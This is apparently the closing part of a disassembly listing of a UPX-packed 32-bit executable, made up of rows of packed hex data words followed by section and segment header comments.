dd 0B006D855h, 0BC4E254h, 0C58D54ECh, 409A4024h, 48A1B3C8h
dd 821044h, 0E1F68A4Bh, 3779D876h, 257D473Fh, 8062D2B8h
dd 596AF547h, 402A503Ch, 229230A8h, 726108D3h, 69EED9ACh
dd 0D01814A9h, 88A53B98h, 5A5A015h, 60DE4914h, 404A504Ch
dd 383132FCh, 0FC69F855h, 0BE70F7Fh, 0E849D3F0h, 0F1BAC253h
dd 0DF9663A2h, 0F01BFD29h, 0C92A40D5h, 30E4F8D5h, 5F86E3E4h
dd 72AFFF3Eh, 0C1255751h, 35ACB058h, 8002A956h, 0B2E77625h
dd 523E06B4h, 0C9D6B92Eh, 0FFD8372Ch, 0AAF5AABFh, 0D0B0D3B0h
dd 99F235CFh, 80F290A4h, 21E35030h, 0C9F925A9h, 3024F4A5h
dd 686713A4h, 635EE030h, 0C0DAB83Bh, 0E37DB018h, 0D35519BCh
dd 974E7010h, 50F51009h, 20463108h, 0C7C56484h, 409EF843h
dd 454D70DCh, 0A026897Ch, 90B29074h, 887C7784h, 0BF55A737h
dd 0E4ABBBB2h, 0E3A20026h, 0C85579E5h, 4D11DDB7h, 0A006F218h
dd 837992B7h, 97263B5Bh, 50B3D4C9h, 200633C8h, 8B966444h
dd 0F0BC3845h, 70F7D33Ch, 0A3F6A0FAh, 90303CB1h, 0EBE671B0h
dd 0C5E14066h, 20F672D4h, 736A5A1Dh, 0E89479A3h, 434A921Dh
dd 2BD6E8FBh, 90101491h, 495E1890h, 24B500Ch, 63C76980h
dd 82D79A54h, 17BEE0B9h, 0D0035479h, 0A0B6B078h, 8334E4D4h
dd 70BE18FDh, 0B72AE6ECh, 309FB4EDh, 22210E4h, 1E8A8560h
dd 449F271Ah, 0A096A061h, 0F51294D4h, 0E33BFA56h, 0B70A40F5h
dd 30BFB4CDh, 4210C4h, 6A758540h, 6A38D2BBh, 5794663Ah
dd 8778995Fh, 62C4B202h, 731DB27Ah, 2ED54FAh, 58E09FC0h
dd 0A2024DA3h, 0CFDAD08Ch, 5FAC0F9Ch, 0F8676F6Bh, 9F4E6052h
dd 50F4E219h, 54F3CF08h, 0FFC200C6h, 0F000D695h, 0A0375D7Ch
dd 2D36A0BAh, 90F0F8E1h, 0A7C21F0h, 1C1FAF6Ch, 0DF2620AAh
dd 109CB6F1h, 0BCAB0FE0h, 3F9AC01Eh, 0B028964Dh, 0C8271D54h
dd 9F0E6091h, 50C808F9h, 0B5F966C8h, 922EE6h, 0A2A25543h
dd 37AD02Ch, 0A0F6B050h, 8118CD34h, 58619D31h, 0B032503Ch
dd 0A063F1A7h, 85620031h, 285D3360h, 15520E3h, 0B0C3301Dh
dd 906F5314h, 15CE5A90h, 3CCB3610h, 51AA3CACh, 0E8220371h
dd 1F410F44h, 75D2D589h, 48494F82h, 7FCD6F26h, 4D515E11h
dd 521E0694h, 20A615D0h, 0A5CA70E4h, 95610F9Fh, 0E45E5BE5h
dd 0E8233D68h, 0B128095h, 0E1E87800h, 330856F6h, 20EE666Dh
dd 8B02EFC4h, 0B27E9A84h, 326F2FECh, 2376A006h, 0BE739870h
dd 3C514F6Ch, 866953D9h, 0DA04D82Ch, 7F0AEF5Bh, 81A10FDFh
dd 0C0AE685Fh, 11BDB018h, 80D2BF2Ch, 60539810h, 6008508Ch
dd 20768808h, 102A1084h
dd 223EF000h, 4502D058h, 4836B0F9h, 80B29077h, 0ED2E5C32h
dd 8DA67438h, 20DEB3C6h, 0E8C20918h, 0E01EF0E0h, 0F0BE84D7h
dd 210C3B85h, 90ABF6B9h, 80E998D0h, 82EBAFB3h, 230730CCh
dd 2851542h, 284C1E86h, 15FF49E0h, 1001194h, 0FF8Bh, 24Eh dup(0)
dd 70000000h, 7FFDh, 1321h dup(0)
UPX2 ends
; Section 4. (virtual address 00013000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00013000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31513000h
align 2000h
_idata2 ends
end start